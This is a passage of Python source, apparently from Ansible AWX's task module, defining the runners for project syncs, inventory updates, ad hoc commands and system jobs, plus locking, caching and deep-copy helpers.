def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning('Galaxy role/collection syncing is enabled, but no ' f'credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return os.path.join('project_update.yml')
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because ' 'project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because ' 'another update is already active.'.format(inv_src.name))
continue
if settings.IS_K8S:
instance_group = InventoryUpdate(inventory_source=inv_src).preferred_instance_groups[0]
else:
instance_group = project_update.instance_group
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
create_partition(local_inv_update.event_class._meta.db_table, start=local_inv_update.created)
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
'''
Note: We don't support blocking=False
'''
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
# force option is necessary because remote refs are not counted, although no information is lost
git_repo.delete_head(tmp_branch_name, force=True)
else:
copy_tree(project_path, destination_folder, preserve_symlinks=1)
# copy over the roles and collection cache to job folder
cache_path = os.path.join(p.get_cache_path(), p.cache_id)
subfolders = []
if settings.AWX_COLLECTIONS_ENABLED:
subfolders.append('requirements_collections')
if settings.AWX_ROLES_ENABLED:
subfolders.append('requirements_roles')
for subfolder in subfolders:
cache_subpath = os.path.join(cache_path, subfolder)
if os.path.exists(cache_subpath):
dest_subpath = os.path.join(job_private_data_dir, subfolder)
copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
super(RunProjectUpdate, self).post_run_hook(instance, status)
# To avoid hangs, very important to release lock even if errors happen here
try:
if self.playbook_new_revision:
instance.scm_revision = self.playbook_new_revision
instance.save(update_fields=['scm_revision'])
# Roles and collection folders copy to durable cache
base_path = instance.get_cache_path()
stage_path = os.path.join(base_path, 'stage')
if status == 'successful' and 'install_' in instance.job_tags:
# Clear other caches before saving this one, and if branch is overridden
# do not clear cache for main branch, but do clear it for other branches
self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
cache_path = os.path.join(base_path, instance.cache_id)
if os.path.exists(stage_path):
if os.path.exists(cache_path):
logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
shutil.rmtree(cache_path)
os.rename(stage_path, cache_path)
logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
elif os.path.exists(stage_path):
shutil.rmtree(stage_path) # cannot trust content update produced
if self.job_private_data_dir:
if status == 'successful':
# copy project folder before resetting to default branch
# because some git-tree-specific resources (like submodules) might matter
self.make_local_copy(instance, self.job_private_data_dir)
if self.original_branch:
# for git project syncs, non-default branches can be problems
# restore to branch the repo was on before this run
try:
self.original_branch.checkout()
except Exception:
# this could have failed due to dirty tree, but difficult to predict all cases
logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
finally:
self.release_lock(instance)
p = instance.project
if instance.job_type == 'check' and status not in (
'failed',
'canceled',
):
if self.playbook_new_revision:
p.scm_revision = self.playbook_new_revision
else:
if status == 'successful':
logger.error("{} Could not find scm revision in check".format(instance.log_format))
p.playbook_files = p.playbooks
p.inventory_files = p.inventories
p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])
# Update any inventories that depend on this project
dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
if len(dependent_inventory_sources) > 0:
if status == 'successful' and instance.launch_type != 'sync':
self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
project_path = instance.get_project_path(check_if_exists=False)
cache_path = instance.get_cache_path()
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{project_path}:{project_path}:Z",
f"{cache_path}:{cache_path}:Z",
]
)
return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
model = InventoryUpdate
event_model = InventoryUpdateEvent
event_data_key = 'inventory_update_id'
def build_private_data(self, inventory_update, private_data_dir):
"""
Return private data needed for inventory update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
If no private data is needed, return None.
"""
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
return injector.build_private_data(inventory_update, private_data_dir)
def build_env(self, inventory_update, private_data_dir, private_data_files=None):
"""Build environment dictionary for ansible-inventory.
Most environment variables related to credentials or configuration
are accomplished by the inventory source injectors (in this method)
or custom credential type injectors (in main run method).
"""
env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Pass inventory source ID to inventory script.
env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
env.update(STANDARD_INVENTORY_UPDATE_ENV)
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[inventory_update.source]()
if injector is not None:
env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
# All CLOUD_PROVIDERS sources implement as inventory plugin from collection
env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'
if inventory_update.source == 'scm':
for env_k in inventory_update.source_vars_dict:
if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
elif inventory_update.source == 'file':
raise NotImplementedError('Cannot update file sources through the task system.')
if inventory_update.source == 'scm' and inventory_update.source_project_update:
env_key = 'ANSIBLE_COLLECTIONS_PATHS'
config_setting = 'collections_paths'
folder = 'requirements_collections'
default = '~/.ansible/collections:/usr/share/ansible/collections'
config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
if 'ANSIBLE_COLLECTIONS_PATHS' in env:
paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
else:
paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
paths.append('/usr/share/automation-controller/collections')
env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)
return env
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_args(self, inventory_update, private_data_dir, passwords):
"""Build the command line argument list for running an inventory
import.
"""
# Get the inventory source and inventory.
inventory_source = inventory_update.inventory_source
inventory = inventory_source.inventory
if inventory is None:
raise RuntimeError('Inventory Source is not associated with an Inventory.')
args = ['ansible-inventory', '--list', '--export']
# Add arguments for the source inventory file/script/thing
rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
container_location = os.path.join(CONTAINER_ROOT, rel_path)
source_location = os.path.join(private_data_dir, rel_path)
args.append('-i')
args.append(container_location)
args.append('--output')
args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))
if os.path.isdir(source_location):
playbook_dir = container_location
else:
playbook_dir = os.path.dirname(container_location)
args.extend(['--playbook-dir', playbook_dir])
if inventory_update.verbosity:
args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))
return args
def build_inventory(self, inventory_update, private_data_dir):
return None # what runner expects in order to not deal with inventory
def pseudo_build_inventory(self, inventory_update, private_data_dir):
"""Inventory imports are ran through a management command
we pass the inventory in args to that command, so this is not considered
to be "Ansible" inventory (by runner) even though it is
Eventually, we would like to cut out the management command,
and thus use this as the real inventory
"""
src = inventory_update.source
injector = None
if inventory_update.source in InventorySource.injectors:
injector = InventorySource.injectors[src]()
if injector is not None:
content = injector.inventory_contents(inventory_update, private_data_dir)
# must be a statically named file
inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
with open(inventory_path, 'w') as f:
f.write(content)
os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
rel_path = os.path.join('inventory', injector.filename)
elif src == 'scm':
rel_path = os.path.join('project', inventory_update.source_path)
return rel_path
def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
return None
def build_credentials_list(self, inventory_update):
# All credentials not used by inventory source injector
return inventory_update.get_extra_credentials()
def pre_run_hook(self, inventory_update, private_data_dir):
super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
source_project = None
if inventory_update.inventory_source:
source_project = inventory_update.inventory_source.source_project
if (
inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
): # never ever update manual projects
# Check if the content cache exists, so that we do not unnecessarily re-download roles
sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=Instance.objects.me().hostname,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
